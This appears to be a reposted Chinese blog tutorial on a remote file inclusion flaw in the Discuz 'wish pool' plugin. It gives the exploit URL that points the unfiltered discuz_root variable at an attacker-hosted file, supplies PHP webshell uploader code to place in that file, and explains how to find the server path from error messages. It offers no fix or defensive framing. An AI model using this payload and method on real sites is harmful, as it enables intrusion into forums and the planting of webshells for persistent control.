discuz许愿池插件远程包含漏洞


本文整理自网络,侵删。

许愿池插件的wish.php文件出的问题:
require $discuz_root.'./include/discuzcode.func.php';

手工利用方法:
远程包含漏洞,变量discuz_root过滤不严,利用方法:
http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt?
不一定非要txt后缀,可以改为任意后缀,后面一定要记得加问号。
这里xxxx.txt用CN.Tink的那个小马写个shell进去:
<?copy($_FILES[MyFile][tmp_name],"C:\Inetpub\vhosts\baidu.com\bbs\guizai.php");?>
<form ENCTYPE="multipart/form-data" ACTION="" METHOD="POST">
<input NAME="MyFile" TYPE="file">
<input VALUE=" 提交 " TYPE="submit">
</form>
网站物理路径可以通过提交http://url/wish.php?discuz_root=http://www.huaidan.org/xxxx.txt ,看错误提示信息,然后修改xxxx.txt中的路径即可。 guizai.php就是你上传的shell的名字。 

更多关于Discuz论坛内容来自木庄网络博客


标签:Discuz论坛

相关阅读 >>

网站数据自动备份方法

discuz 跨域整合的记录文件

destoon首页调用求购供应信息的地区名称的方法

discuz!nt 源文件变成乱码的解决方法

destoon实现底部添加你是第几位访问者的方法

Discuz论坛上传图片附件成功贴子里看不到图片

destoon会员注册提示“数据校验失败(2)”解决方法

discuz! 6.0.1 (searchid) remote sql injection exploit

经验贴:discuz 做站的一些小提示,尤其是门户模块

discuz6.1.0升级到discuz7.0.0图文教程

更多相关阅读请进入《Discuz论坛》频道 >>



打赏

取消

感谢您的支持,我会继续努力的!

扫码支持
扫码打赏,您说多少就多少

打开支付宝扫一扫,即可进行扫码打赏哦

分享从这里开始,精彩与您同在

评论

管理员已关闭评论功能...